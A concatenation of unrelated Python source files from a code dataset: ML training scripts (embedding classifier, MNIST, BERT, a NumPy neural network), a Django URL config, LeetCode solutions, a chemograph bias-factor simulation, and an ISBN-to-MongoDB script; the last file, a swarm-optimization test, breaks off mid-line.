default=\"wmt20-sent.en-ha.ha.xlmr\", help=\"source embedding to use for training. Note: Change loading based on encoder\")\r\nparser.add_argument(\"--tgt_embedding\", default=\"wmt20-sent.en-ha.en.xlmr\", help=\"target embedding to use for training. Note: Change loading based on encoder\")\r\nparser.add_argument(\"--neg_src\", default=\"neg-1.txt\", help=\"file with negative samples generated using source language\")\r\nparser.add_argument(\"--neg_tgt\", default=\"neg-2.txt\", help=\"file with negative samples generated using target language\")\r\nargs = parser.parse_args()\r\n\r\n\r\n\r\n#load embeddings stored in theform of a dictionary\r\nf = open(args.tgt_embedding,\"r\")\r\nendict = [np.array(list(map(float,i.lstrip().rstrip().split(' ')))) for i in f]\r\nf.close()\r\nf = open(args.src_embedding,\"r\")\r\npsdict = [np.array(list(map(float,i.lstrip().rstrip().split(' ')))) for i in f]\r\nf.close()\r\n\r\n\r\n#get previous iteration's scores along with the positive samples's indexes\r\nf = open(args.previous_scores,\"r\")\r\nsc = [float(i.rstrip().lstrip()) for i in f]\r\nsc = np.nonzero(sc)[0][args.starting_rank:args.ending_rank]\r\n\r\nX7 = [list(psdict[int(i)])+list(endict[int(i)]) for i in sc]\r\ny7 = [1 for i in range(len(X7))]\r\nf.close()\r\n\r\n\r\n\r\n#get the negative samples associated with the positive samples\r\n\r\nX3 = [list(psdict[i-1])+list(endict[i-1]) for i in sc]\r\nX4 = [list(psdict[i+1])+list(endict[i+1]) for i in sc]\r\ny3 = [0 for i in range(len(X3))]\r\ny4 = [0 for i in range(len(X4))]\r\n\r\nf = open(args.neg_src,\"r\")\r\nX1 = [list(psdict[int(i.split(',')[1].lstrip())])+list(endict[int(i.split(',')[0].rstrip())]) for i in f]\r\ny1 = [0 for i in range(len(X3))]\r\nf.close()\r\nprint(\"here4\")\r\n\r\nf = open(args.neg_tgt,\"r\")\r\nX2 = [list(psdict[int(i.split(',')[0].lstrip())])+list(endict[int(i.split(',')[1].rstrip())]) for i in f]\r\ny2 = [0 for i in range(len(X4))]\r\nf.close()\r\nprint(\"here5\")\r\n\r\n#f = open(\"pos-1.txt\",\"r\")\r\n#X5 = [list(psdict[int(i.split(',')[1].lstrip())])+list(endict[int(i.split(',')[0].rstrip())]) for i in f]\r\n#y5 = [0 for i in range(len(X5))]\r\n#f.close()\r\n#print(\"here6\")\r\n#f = open(\"pos-2.txt\",\"r\")\r\n#X6 = [list(psdict[int(i.split(',')[0].lstrip())])+list(endict[int(i.split(',')[1].rstrip())]) for i in f]\r\n#y6 = [0 for i in range(len(X6))]\r\n\r\n\r\n\r\n#combine the positive and negative samples to get training data and make sure that we don't have sentences with an invalid embedding (due to a max size limit on xlmr)\r\nX = X1 + X2 + X3 + X4\r\ny = y1 + y2 + y3 + y4\r\nt = int(len(X)/len(X7))\r\nfor i in range(t):\r\n X = X + X7\r\n y = y + y7\r\nfor i in range(len(X)):\r\n# print(i)\r\n if len(X[i]) != 2048:\r\n del X[i]\r\n del y[i]\r\n\r\n\r\n\r\n\r\n#actually do the training and save the results\r\ntry:\r\n clf = pickle.load(open(args.model_name, 'rb'))\r\n clf.fit(X,y)\r\nexcept:\r\n clf = MLPClassifier(random_state=1, verbose = True, early_stopping=False, warm_start = True, learning_rate=\"invscaling\", learning_rate_init=0.00002, max_iter=1000, hidden_layer_sizes=(2048,2048,2048,2048,)).fit(X, y)\r\ntry:\r\n pickle.dump(clf, open(args.model_name,\"wb\"))\r\nexcept:\r\n c = 0\r\nf = open(args.current_scores,\"w\")\r\nfor i in range(len(psdict)):\r\n t = list(psdict[int(i)])+list(endict[int(i)])\r\n if len(t) != 2048:\r\n f.write(\"0\")\r\n f.write(\"\\n\")\r\n else:\r\n f.write(str(clf.predict_proba(np.array(t).reshape(1,-1))[0][1]))\r\n f.write(\"\\n\")\r\n","sub_path":"Scikit-version/classifier2.py","file_name":"classifier2.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422819597","text":"from django.conf.urls import patterns, include, url\nfrom django.conf import settings\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'django_apps.views.home', name='home'),\n # url(r'^django_apps/', include('django_apps.foo.urls')),\n\n\turl(r'^inventory/', include('inventory.urls')),\n\turl(r'^bookstore/', include('bookstore.urls')),\n\t\n # Uncomment the admin/doc line below to enable admin documentation:\n\turl(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n \n # Static files (FOR DEVELOPMENT ONLY!)\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n)\n\n#if settings.DEBUG:\n#\turlpatterns += patterns('django.contrib.staticfiles.views', url(r'^static/(?P.*)$', 'serve'),)\n","sub_path":"django_apps/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365834144","text":"class Solution(object):\n def threeSum(self, nums):\n if len(nums) < 3:\n return []\n result = []\n nums.sort()\n \n for i in range(len(nums)):\n target = 0 - nums[i]\n dic = {}\n for j in range(i+1, len(nums)):\n if target - nums[j] in dic:\n temp = [nums[i], target - nums[j], nums[j]]\n if temp not in result:\n result.append(temp)\n else:\n dic[nums[j]] = j\n return result","sub_path":"Array/3Sum.py","file_name":"3Sum.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557868964","text":"'''\nFile name: nuralNetwork.py\n Implemetation of a Neural Network, without using external NN libraries.\n \nAuthor: Vasileios Saveris\nenail: vsaveris@gmail.com\n\nLicense: MIT\n\nDate last modified: 01.12.2019\n\nPython Version: 3.6\n'''\n\nimport numpy as np\n\nclass NeuralNetwork():\n '''\n Neural Network object.\n\n Args:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n learning_rate (float): \n The learning rate in (0, 1]\n \n Attributes:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n lr (float): \n The learning rate in (0, 1]\n activation_function (function):\n The activation function of the ANN (sigmoid)\n weights_input_to_hidden (numpy array 2D): \n The wights from the input to the hidden layer.\n weights_hidden_to_output (numpy array 2D): \n The wights from the hidden to the output layer.\n \n Methods:\n train():\n Train the network on batch of features and targets. \n __feedForwrad():\n Implement feed forward, calculate the hidden layer and final outputs\n __backpropagation():\n Backpropagation implementation.\n __update_weights():\n Update weights on gradient descent step.\n predict:\n Run a forward pass through the network with input features and return\n a prediction.\n '''\n\n def __init__(self, input_nodes, hidden_nodes, output_nodes, learning_rate):\n '''\n Class constructor.\n\n Args:\n input_nodes (int): \n The size of the input layer of the ANN\n hidden_nodes (int): \n The size of the hidden layer of the ANN\n output_nodes (int): \n The size of the output layer of the ANN\n learning_rate (float): \n The learning rate in (0, 1]\n\n Raises:\n -\n\n Returns:\n -\n '''\n\n # Set number of nodes in input, hidden and output layers.\n self.input_nodes = input_nodes\n self.hidden_nodes = hidden_nodes\n self.output_nodes = output_nodes\n\n # Initialize weights\n self.weights_input_to_hidden = np.random.normal(0.0, self.input_nodes**-0.5, \n (self.input_nodes, self.hidden_nodes))\n\n self.weights_hidden_to_output = np.random.normal(0.0, self.hidden_nodes**-0.5, \n (self.hidden_nodes, self.output_nodes))\n self.lr = learning_rate\n \n # Set self.activation_function to the sigmoid\n self.activation_function = lambda x : 1/(1+np.exp(-x))\n \n\n def train(self, features, targets):\n '''\n Train the network on batch of features and targets. \n\n Args:\n features (numpy array 2D): \n Each row is one data record, each column is a feature\n targets (numpy array 1D): \n Target values\n \n Raises:\n -\n\n Returns:\n -\n '''\n \n n_records = features.shape[0]\n delta_weights_i_h = np.zeros(self.weights_input_to_hidden.shape)\n delta_weights_h_o = np.zeros(self.weights_hidden_to_output.shape)\n \n for X, y in zip(features, targets):\n \n final_outputs, hidden_outputs = self.__feedForwrad(X)\n\n delta_weights_i_h, delta_weights_h_o = self.__backpropagation(final_outputs, hidden_outputs, X, y, \n delta_weights_i_h, delta_weights_h_o)\n self.__update_weights(delta_weights_i_h, delta_weights_h_o, n_records)\n\n\n def __feedForwrad(self, X):\n '''\n Implement feed forward, calculate the hidden layer and final outputs\n\n Args:\n X (numpy array 2D): \n Each row is one data record, each column is a feature\n\n Raises:\n -\n\n Returns:\n final_outputs (numpy array 2D): \n Signals from final output layer\n hidden_outputs (numpy array 2D): \n Signals from hidden layer\n '''\n\n # Hidden layer\n hidden_inputs = np.dot(X, self.weights_input_to_hidden) # signals into hidden layer\n hidden_outputs = self.activation_function(hidden_inputs) # signals from hidden layer\n\n # Output layer\n final_inputs = np.dot(hidden_outputs, self.weights_hidden_to_output) # signals into final output layer\n final_outputs = final_inputs # signals from final output layer, the activation function is f(x) = x\n \n return final_outputs, hidden_outputs\n\n\n def __backpropagation(self, final_outputs, hidden_outputs, X, y, delta_weights_i_h, delta_weights_h_o):\n '''\n Backpropagation implementation.\n\n Args:\n final_outputs: \n output from forward pass\n y: \n target (i.e. label) batch\n delta_weights_i_h: \n change in weights from input to hidden layers\n delta_weights_h_o: \n change in weights from hidden to output layers\n\n Raises:\n -\n\n Returns:\n delta_weights_i_h (float): \n Weight step (input to hidden)\n delta_weights_h_o (float): \n Weight step (hidden to output)\n '''\n\n # Output error\n # Output layer error is the difference between desired target and actual output.\n error = y - final_outputs\n\n # activation function of the output layer is f(x) = x, where f'(x) = 1\n output_error_term = error * 1.\n\n # Calculate the hidden layer's contribution to the error\n hidden_error = np.dot(self.weights_hidden_to_output, output_error_term)\n hidden_error_term = hidden_error * hidden_outputs * (1-hidden_outputs)\n\n # Weight step (input to hidden)\n delta_weights_i_h += X[:, None] * hidden_error_term\n\n # Weight step (hidden to output)\n delta_weights_h_o += output_error_term[:,None] * hidden_outputs[:, None]\n\n return delta_weights_i_h, delta_weights_h_o\n\n\n def __update_weights(self, delta_weights_i_h, delta_weights_h_o, n_records):\n '''\n Update weights on gradient descent step.\n\n Args:\n delta_weights_i_h: \n Change in weights from input to hidden layers\n delta_weights_h_o: \n Change in weights from hidden to output layers\n n_records: \n Number of records\n\n Raises:\n -\n\n Returns:\n -\n '''\n\n # update hidden-to-output weights with gradient descent step\n self.weights_hidden_to_output += self.lr*delta_weights_h_o/n_records\n\n # update input-to-hidden weights with gradient descent step\n self.weights_input_to_hidden += self.lr*delta_weights_i_h/n_records\n\n\n def predict(self, features):\n '''\n Run a forward pass through the network with input features and return\n a prediction.\n\n Args:\n features (numpy array 2D): \n Each row is one data record, each column is a feature\n\n Raises:\n -\n\n Returns:\n prediction (numpy array 1D): \n Predictions for the input data.\n '''\n\n return self.__feedForwrad(features)[0]","sub_path":"project_ann/neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"540950390","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data as mnist_data\n#keras api\nfrom tensorflow.python.keras.models import *\nfrom tensorflow.python.keras import Input\nfrom tensorflow.python.keras import layers\nfrom tensorflow.python.keras import optimizers\n\nprint(\"Tensorflow version \" + tf.__version__)\n\n# Download images and labels into mnist.test (10K images+labels) and mnist.train (60K images+labels)\nmnist = mnist_data.read_data_sets(\"data\", one_hot=True, reshape=False, validation_size=0)\n\nprint(\"train examples\", mnist.train.num_examples)\nprint(\"test examples\", mnist.test.num_examples)\n\ni_size = 28\nl1_size = 200\nl2_size = 100\nl3_size = 60\nl4_size = 30\no_size = 10\n\nbatch = 100\nepochs = 20\n\ninputs = Input((i_size, i_size, 1), name=\"input_data\")\nreshape = layers.Reshape((i_size * i_size,))(inputs)\noutputs = layers.Dense(l1_size, activation=tf.nn.relu, name=\"layer1\")(reshape)\noutputs = layers.Dense(l2_size, activation=tf.nn.relu, name=\"layer2\")(outputs)\noutputs = layers.Dense(l3_size, activation=tf.nn.relu, name=\"layer3\")(outputs)\noutputs = layers.Dense(l4_size, activation=tf.nn.relu, name=\"layer4\")(outputs)\noutputs = layers.Dense(o_size, activation=tf.nn.softmax, name=\"layer5\")(outputs)\n\nmodel = Model(inputs=inputs, outputs=outputs)\n\nmodel.compile(optimizer=optimizers.Adagrad(0.003),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\ncb_tensorboard = tf.keras.callbacks.TensorBoard(log_dir='./summary/nn5', histogram_freq=1, write_grads=True, \\\n write_graph=True, write_images=True)\n\nmodel.fit(x=mnist.train.images, y=mnist.train.labels, \\\n batch_size=batch, epochs=epochs, validation_data=(mnist.test.images, mnist.test.labels), \\\n callbacks=[cb_tensorboard]) # starts training\n\n#test\nprint(\"test:\")\nresult = model.evaluate(x=mnist.test.images,\n y=mnist.test.labels)\n\n# all model performance metrics for test\nfor name, value in zip(model.metrics_names, result):\n print(name, value)\n\nmodel.save(\"./save/nn5.h5\")\n","sub_path":"mnist_k_nn5.py","file_name":"mnist_k_nn5.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"107299294","text":"import os\nimport pandas as pd\nimport numpy as np\nimport itertools\n\nfrom numba import njit, guvectorize\n\n\nclass OutputTable(object):\n def __init__(self, out_dir, sampling_method, imputation_method, snap, quantiles, stats_intervals):\n # Initialize path\n self.dir = out_dir\n self.base = \"bf_results_{}_{}_{}.csv\".format(sampling_method, imputation_method, snap)\n self.path = os.path.join(self.dir, self.base)\n self.quantiles = quantiles\n self.intervals = stats_intervals\n\n # Initialize header\n self.header = [\"Site\", \"Year\", \"Sample Interval\", \"Realization\"] + \\\n [\"{}-day Bias Factor\".format(interval) for interval in stats_intervals] + \\\n [\"{}P {}\".format(quantile, var) for var in (\"Slope\", \"RMSE\") for quantile in quantiles]\n\n # Initialize file\n self.initialize_table()\n\n def initialize_table(self):\n # Create output directory if it does not exist\n if not os.path.exists(self.dir):\n os.mkdir(self.dir)\n\n # Create file and write header\n with open(self.path, 'w') as f:\n f.write(\",\".join(self.header) + \"\\n\")\n\n def update_table(self, site, year, sample_interval, realization, bias_factors, slopes, residuals):\n \"\"\" Insert run results into table \"\"\"\n # Arrange data into row\n out_data = [site, year, sample_interval, realization] + list(bias_factors) + list(slopes) + list(residuals)\n\n # Update file\n with open(self.path, 'a') as f:\n f.write(\",\".join(map(str, out_data)) + \"\\n\")\n\n\ndef check_inputs(chemograph_dir, sampling_intervals, start_date):\n # Ensure quarterly sampling\n assert all(1 <= sampling_interval <= 90 for sampling_interval in sampling_intervals), \\\n \"Sampling interval must be between 1 and 90\"\n assert start_date[0] <= 3, \"Start date must be prior to April 1\"\n\n # Check to see if input files exist\n assert os.path.exists(chemograph_dir), \"Directory {} does not exist\".format(chemograph_dir)\n\n\ndef compile_strategies(sampling, imputation, snap):\n \"\"\" This function compiles valid combinations of all run parameters \"\"\"\n valid_fields = [(\"sample selection\", sampling, [\"random\", \"stratified\"]),\n (\"imputation\", imputation, [\"linear\", \"log_linear\", \"stair\"]),\n (\"snap\", snap, [\"yes\", \"no\"])]\n\n output_sets = []\n for label, strategy, strategies in valid_fields:\n assert strategy in strategies + [\"all\"], \\\n \"{} strategy must be '{}', or 'all'\".format(label, \"', '\".join(strategies))\n output_sets.append((strategy,) if strategy != 'all' else strategies)\n\n combinations = list(itertools.product(*output_sets))\n for i, invalid_set in enumerate(filter(lambda x: x[0] == \"random\" and x[2] == \"yes\", combinations)):\n if not i:\n print(\"Cannot run random sampling with date snap\")\n combinations.remove(invalid_set)\n\n assert len(combinations) > 0, \"No valid combinations of sampling method, imputation method, and snapping provided\"\n\n return combinations\n\n\n@guvectorize(['void(float64[:], float64[:, :], float64[:], float64[:])'], '(n),(o, n),(p)->(p)')\ndef compute_bias_factor(chemograph, simulated_chemographs, stats_intervals, results):\n # Loop through intervals\n for i in range(stats_intervals.size):\n stats_interval = stats_intervals[i]\n\n # Get the max moving-window mean value from the chemograph\n true_value = max_mean(chemograph, stats_interval)\n\n # Get the max moving-window mean for each of the 10,000 simulations\n sampling_values = np.zeros(simulated_chemographs.shape[0])\n for j in range(simulated_chemographs.shape[0]):\n sampling_values[j] = max_mean(simulated_chemographs[j], stats_interval)\n\n # The bias factor is chemograph max-mean divided by the 5th percentile simulation max-mean\n p5 = np.percentile(sampling_values, 5).round(10)\n results[i] = true_value / p5\n\n\n@njit\ndef interpolate(chemograph, n_simulations, n_periods, sampling_interval, tail, sample_method, imputation_method, snap):\n \"\"\" Generate a set of 10,000 simulated chemographs based on random sampling \"\"\"\n\n # Initialize the output array\n results = np.zeros((n_simulations, chemograph.size)) - 1\n\n # If doing log-linear imputation, log-transform the chemograph\n if imputation_method == 3:\n chemograph = np.log10(chemograph)\n\n # Generate sample period boundaries for use if using stratified sampling\n if sample_method > 0:\n sample_periods = np.arange(0, chemograph.size, sampling_interval)\n\n # Iterate simulations\n for i in range(n_simulations):\n\n # Set sampling dates\n if sample_method == 1: # random\n sample_dates = np.sort(np.random.choice(chemograph.size, n_periods + 1, replace=False))\n else: # stratified\n sample_dates = sample_periods + np.random.randint(0, sampling_interval, sample_periods.shape)\n\n # bound upper sample to be less than 365. only affects stair-step (JCH - when does this happen?)\n if sample_dates[-1] > 364:\n sample_dates[-1] = 364\n\n # Iterate sampling dates\n for j in range(n_periods - 1):\n if snap: # assign the sampled value to the first day in the period\n period_start, period_end = j * sampling_interval, ((j * sampling_interval) + sampling_interval)\n else: # don't do that\n period_start, period_end = sample_dates[j], sample_dates[j + 1]\n\n start_val = chemograph[sample_dates[j]]\n end_val = chemograph[sample_dates[j + 1]]\n\n # Iterate days in sampling period\n for k in range(period_start, period_end + 1):\n if imputation_method == 1: # stair step\n results[i, k] = start_val\n if k == period_end:\n break\n else:\n day = k - period_start\n if imputation_method == 2: # linear\n results[i, k] = start_val + ((end_val - start_val) / (period_end - period_start)) * day\n if imputation_method == 3: # log-linear\n results[i, k] = 10 ** (start_val + ((end_val - start_val) / (period_end - period_start)) * day)\n\n # Extend values across last period if not interpolating\n if imputation_method == 1 and sample_method == 2 and snap == 1:\n if chemograph.size - period_end > sampling_interval:\n for k in range(sampling_interval):\n results[i, period_end + k] = chemograph[sample_dates[-2]]\n\n for k in range(tail):\n results[i, period_end + sampling_interval + k] = chemograph[sample_dates[-1]]\n\n return results\n\n\n@njit\ndef max_mean(chemograph, stats_interval):\n \"\"\" Use a moving window to get a series of sample means and return the maximum \"\"\"\n maximum = 0\n for j in range(chemograph.size - stats_interval + 1):\n window_total = 0\n window_count = 0\n for k in range(stats_interval):\n value = chemograph[j + k]\n if value >= 0:\n window_total += value\n window_count += 1\n if window_count > 0:\n window_mean = window_total / window_count\n if window_mean > maximum:\n maximum = window_mean\n return maximum\n\n\ndef percentiles(values, quantiles):\n return [np.percentile(values, quantile) for quantile in quantiles]\n\n\n@njit\ndef process_residuals(simulated_chemographs, chemograph):\n \"\"\" Calculate slopes in a batch \"\"\"\n n_repetitions = simulated_chemographs.shape[0]\n slope, rmse = np.zeros(n_repetitions), np.zeros(n_repetitions)\n for i in range(simulated_chemographs.shape[0]):\n\n # Initialize the x and y arrays to feed to the linear regression function\n x = np.ones((chemograph.size, 2))\n residual = np.zeros(chemograph.size)\n\n # Loop through each day in chemograph, get residual and add to x, y arrays if the value > 0 (not no-data)\n index = 0\n for j in range(chemograph.size):\n simulated_value = simulated_chemographs[i, j]\n if simulated_value >= 0:\n x[index, 0] = j\n residual[index] = chemograph[j] - simulated_value\n index += 1\n\n slope[i] = np.linalg.lstsq(x[:index], residual[:index])[0][0] # linear regression function\n rmse[i] = np.sqrt((residual[:index] ** 2).mean()) # RMSE function\n\n return slope, rmse\n\n\ndef print_chemographs(chemograph, simulated_chemographs, site_id, n=10):\n \"\"\" Write sampled chemographs to file for QC purposes \"\"\"\n\n out_dir = os.path.join(\"QC\") # CAP - os.path.join(\"..\", \"usgs files\", \"atrazine\")\n outfile = os.path.join(out_dir, site_id + \"chemograph.csv\")\n sample = pd.DataFrame(data=np.vstack([chemograph, simulated_chemographs[:n]]).T)\n sample.to_csv(outfile)\n\n\ndef process_chemograph(chemograph, n_simulations, sampling_interval, quantiles,\n sampling_method, imputation_method, snap, stats_intervals,\n site=None, write_chemographs=False, qc_n=10):\n \"\"\" The main routine: generate 10,000 simulations, and calculate bias factors and such \"\"\"\n\n # numba compiled functions (interpolate) don't take strings: convert methods to numbers\n sample_method = {'random': 1, 'stratified': 2}[sampling_method]\n imputation_method = {'stair': 1, 'linear': 2, 'log_linear': 3}[imputation_method]\n snap = {'yes': 1, 'no': 0}[snap]\n stats_intervals = np.array(stats_intervals)\n\n # The number of sampling periods in a year, and the length of the last incomplete period\n n_periods, tail = divmod(chemograph.size, sampling_interval)\n\n # Generate randomly-sampled chemograph simulations\n simulated_chemographs = interpolate(chemograph, n_simulations, n_periods, sampling_interval, tail,\n sample_method, imputation_method, snap)\n\n # Print out chemograph and simulated chemographs to QC\n if write_chemographs:\n print_chemographs(chemograph, simulated_chemographs, site, qc_n)\n\n # Get slopes of input and simulated chemographs\n simulated_slopes, simulation_residuals = process_residuals(simulated_chemographs, chemograph)\n\n # Calculate bias factors\n bias_factors = compute_bias_factor(chemograph, simulated_chemographs, stats_intervals)\n\n return percentiles(simulated_slopes, quantiles), percentiles(simulation_residuals, quantiles), bias_factors\n\n\ndef read_chemographs(chemograph_dir, start_date=(1, 1), end_date=(12, 31)):\n # Loop through chemograph files\n for f in filter(lambda x: x.endswith(\".txt\"), os.listdir(chemograph_dir)):\n\n # Load tables\n site_name = f.rstrip(\".csv\")\n table_path = os.path.join(chemograph_dir, f)\n table = pd.read_csv(table_path, sep=\"\\t\")\n\n # Initialize date index and filter out dates outside the specified range\n dates = pd.DatetimeIndex(table.date) # JCH - originally coerces dtype to np.datetime64 - not necessary?\n\n # Adjust dates if manual start or end dates are used\n if start_date != (1, 1) or end_date != (12, 31):\n (start_month, start_day), (end_month, end_day) = start_date, end_date\n date_filter = ((dates.month > start_month) | ((dates.month == start_month) & (dates.day >= start_day))) & \\\n ((dates.month < end_month) | ((dates.month == end_month) & (dates.day <= end_day)))\n table = table[date_filter]\n dates = dates[date_filter]\n\n # Iterate through years to get site-year tables\n chemograph_fields = [f for f in table.columns if f.startswith(\"csim\")]\n for year in sorted(np.unique(dates.year)):\n yield site_name.rstrip(\".txt\"), year, table[dates.year == year][chemograph_fields].T.as_matrix()\n\n\ndef main():\n # Data paths\n chemograph_dir = os.path.join(\"AtzRockV2100\") # CAP - os.path.join(\"..\", \"usgs_files\", \"atrazine\")\n output_dir = os.path.join(\"AtzRockV2100\",\"Output\") # CAP - os.path.join(\"..\", \"usgs_files\", \"atrazine\", \"Output\")\n\n # Parameters\n stats_intervals = [1, 4, 7, 21, 60, 90] # any positive number between 1 and 90\n start_date = (1, 1) # date to pick first sample from, must be before Mar 31 (ensures we have at least quarterly)\n end_date = (12, 31)\n sampling_strategy = \"random\" # can be 'random', 'stratified', or 'all'\n imputation = \"log_linear\" # can be 'linear', 'log_linear', or 'stair'\n snap = \"no\" # can be \"yes\", \"no\", or \"both\"\n n_simulations = 10000 # number of random samples\n sampling_intervals = [7, 14, 21, 28]\n quantiles = (0.1, 10, 50, 90, 99.9)\n\n # Diagnostic\n qc_mode = False # If True, will write sampled chemographs to file\n qc_sample = 10 # Number of sample chemographs to be written if QC mode is on\n\n \"\"\" All path and parameter variables are set before this line. The rest is program functionality \"\"\"\n\n # Inspect inputs and get all combinations of run parameters\n check_inputs(chemograph_dir, sampling_intervals, start_date)\n strategies = compile_strategies(sampling_strategy, imputation, snap)\n\n # Iterate through all combinations of sampling, imputation, and snap methods\n for sampling_method, imputation_method, snap in strategies:\n\n # Iterate through all 50 or so chemographs for the site\n output = OutputTable(output_dir, sampling_method, imputation_method, snap, quantiles, stats_intervals)\n\n # Iterate through sampling intervals:\n for sampling_interval in sampling_intervals:\n\n # Loop through each site-year and process\n for site, year, chemographs in read_chemographs(chemograph_dir, start_date, end_date):\n\n # Loop through all chemographs in file\n for i, chemograph in enumerate(chemographs):\n print(\"Processing {}, {}, {}-day {} sampling, {} imputation, {} snap, simulation #{} ...\".format(\n site, year, sampling_interval, sampling_method, imputation_method, snap, i + 1))\n\n # Analyze the chemograph and perform Monte Carlo sampling\n slopes, residuals, bias_factors = \\\n process_chemograph(chemograph, n_simulations, sampling_interval, quantiles,\n sampling_method, imputation_method, snap, stats_intervals,\n site=\"{}_{}\".format(site, i), write_chemographs=qc_mode, qc_n=qc_sample)\n\n # Write results to output table\n output.update_table(site, year, sampling_interval, i+1, bias_factors, slopes, residuals)\n\n\nmain()\n","sub_path":"bias-factors/code/ncg_merge.py","file_name":"ncg_merge.py","file_ext":"py","file_size_in_byte":14819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"319024297","text":"import pymongo\nfrom pymongo import MongoClient\nfrom bson.objectid import ObjectId\nfrom bson.json_util import dumps\nimport json\nimport time\nfrom random import choice\nfrom string import ascii_uppercase\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\nclient = MongoClient('localhost',27017)\nprint(\"Connected to database\")\n\ndb = client.lounge_library\ncollection = db.lounge_library_isbn_10\n\nwhile True:\n\tnew_num = input(\"Enter an ISBN; \")\n\tcheck_sum = new_num[9]\n\tif (len(new_num) == 10):\n\t\tadd = False\n\t\tnum = 0\n\t\tfor i in range(1, 10):\n\t\t\tnum += (int(new_num[i - 1]) * i)\n\n\t\tif (new_num[9] == 'x' and num % 11 == 10):\n\t\t\tdocument = {\n\t\t\t\t'isbn': new_num\n\t\t\t}\n\t\t\tcollection.insert_one(document)\n\t\telif (num % 11 == int(new_num[9])):\n\t\t\tdocument = {\n\t\t\t\t'isbn': new_num\n\t\t\t}\n\t\t\tcollection.insert_one(document)\n\t\telse:\n\t\t\tprint(\"Bad Checksum\")\n\telse:\n\t\tprint(new_num + \" is not a valid ISBN\")","sub_path":"add-books.py","file_name":"add-books.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564550523","text":"\n# 最长上升子序列 300\n\nfrom typing import List\n\n\nclass Solution:\n def lengthOfLIS(self, nums: List[int]) -> int:\n dp = [1 for i in len(nums)]\n for i in range(len(nums)):\n for j in range(i):\n if nums[j] < nums[i]:\n dp[i] = max(dp[i], dp[j]+1)\n\n return max(dp)\n\n\nclass Solution1:\n def lengthOfLIS(self, nums: List[int]) -> int:\n # base case\n dp = [1 for i in range(len(nums))]\n for i in range(len(nums)):\n for j in range(i):\n if nums[j] < nums[i]:\n dp[i] = max(dp[i], dp[j]+1)\n return max(dp)\n\n\nnums = [10, 9, 2, 5, 3, 7, 101, 18]\n\nnums = [1, 2, 4, 3, 5, 4, 7, 2]\ns = Solution1()\nprint(s.lengthOfLIS(nums))\n\n\n\n\n\n\n\n\n\n","sub_path":"dynamic/longest_common_subsequence/longest_increase_subsequence_300.py","file_name":"longest_increase_subsequence_300.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157570934","text":"import torch \nimport torch.nn as nn \nfrom networks.bertmodel.bertmodel import BertModel\nfrom networks.weights.load_weights_from_s3 import load_weights_from_s3\n\n\nclass BertForIMDBClassification(nn.Module):\n def __init__(self, config, tag_size=2):\n '''BertModelをクラス分類の出力に改良したモデル '''\n super(BertForIMDBClassification, self).__init__()\n # BertModelの事前学習させたパラメータを使った学習\n # 初期時点で学習済パラメータの読み込みをする \n bert = BertModel(config)\n bert.eval()\n param_name = []\n for name, param in bert.named_parameters():\n param_name.append(name)\n\n bert_state_dict = bert.state_dict()\n loaded_model_dict = load_weights_from_s3()\n for i, (k, v) in enumerate(loaded_model_dict.items()):\n name = param_name[i]\n bert_state_dict[name] = v \n\n if i+1 >= len(param_name):\n break \n bert.load_state_dict(bert_state_dict)\n # bert の重みを学習させない\n for param in bert.parameters():\n param.requires_grad = False \n\n self.bert = bert \n\n self.fc = nn.Linear(config.hidden_size, tag_size)\n # initlize last linear layer weights \n nn.init.normal_(self.fc.weight, std=.02)\n nn.init.normal_(self.fc.bias, 0)\n\n def forward(self, input_ids, token_type_ids, mask=None, attention_flg=False):\n if attention_flg:\n output_bert, weights = self.bert(input_ids, token_type_ids, mask, attention_flg=True)\n # 4 layers \n output = self.fc(output_bert)\n return output, weights \n else:\n output_bert = self.bert(input_ids, token_type_ids, mask)\n output = self.fc(output_bert)\n return output","sub_path":"models/bert/networks/.ipynb_checkpoints/classifier_net-checkpoint.py","file_name":"classifier_net-checkpoint.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"311196342","text":"'''\r\nCreated on 2014-3-19\r\n\r\n@author: Walter\r\n'''\r\n\r\nfrom Swarm import *\r\n\r\nif __name__ == '__main__':\r\n \r\n def Griewank(X):\r\n val = 0.0\r\n for d in range(30):\r\n val += X[0,d]**2 \r\n val /= 4000.0\r\n val2 = 0.0\r\n for d in range(30):\r\n val2 *= np.cos(X[0,d]/np.sqrt(float(d))) + 1\r\n return val - val2\r\n \r\n bounds = []\r\n bests = []\r\n swarm = Swarm(20, 30)\r\n swarm.setParam(2.0, 2.0, 0.8, 